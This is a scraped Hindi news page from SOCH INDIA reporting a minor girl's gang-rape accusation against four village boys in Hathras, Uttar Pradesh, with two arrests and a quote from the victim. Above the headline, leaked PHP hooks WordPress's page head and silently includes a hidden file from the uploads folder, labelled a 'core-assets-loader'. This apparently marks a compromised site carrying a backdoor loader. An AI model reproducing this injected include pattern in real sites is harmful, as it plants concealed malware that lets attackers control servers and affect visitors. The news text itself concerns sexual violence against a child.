add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हाथरस में नाबालिग लड़की से गैंगरेप का आरोप, पुलिस ने दो आरोपियों को गिरफ्तार किया – SOCH INDIA
Menu

अपराध समाचार
हाथरस में नाबालिग लड़की से गैंगरेप का आरोप, पुलिस ने दो आरोपियों को गिरफ्तार किया

nobanner

उत्तर प्रदेश के हाथरस में एक नाबालिग लड़की ने चार लड़कों पर गैंगरेप का आरोप लगाया है. पुलिस ने दो आरोपियों को गिरफ्तार कर लिया है और बाकी दो आरोपियों की गिरफ्तारी के लिए छापे मार रही है.

हाथरस जिले के एक गांव की रहनेवाली नाबालिग लड़की का आरोप है कि चार लड़कों ने शनिवार की रात उसके साथ खेत में दुष्कर्म किया है.

पीड़िता का कहना है, ‘’उन्होंने मेरा मुंह बंद किया फिर हाथ बांधे और फिर पैर बांधे. मुझे दवा सुंघाकर दूसरे खेत में ले जाके डाल दिया और मेरे साथ गंदी हरकतें की. पीड़िता का कहना है कि वह तीन लोगों को जानती है.’’

लड़की जिन लड़कों का नाम ले रही है, उसमें से दो लोगों को पुलिस ने गिरफ्तार कर लिया है और आगे की कार्रवाई के लिए अब वो मेडिकल रिपोर्ट का इंतजार कर रही है. गैंगरेप का आरोप जिन लड़कों पर लग रहा है वो पीड़ित लड़की के गांव के ही रहनेवाले हैं. लिहाजा इस मामले को लेकर गांव में भी तनाव है.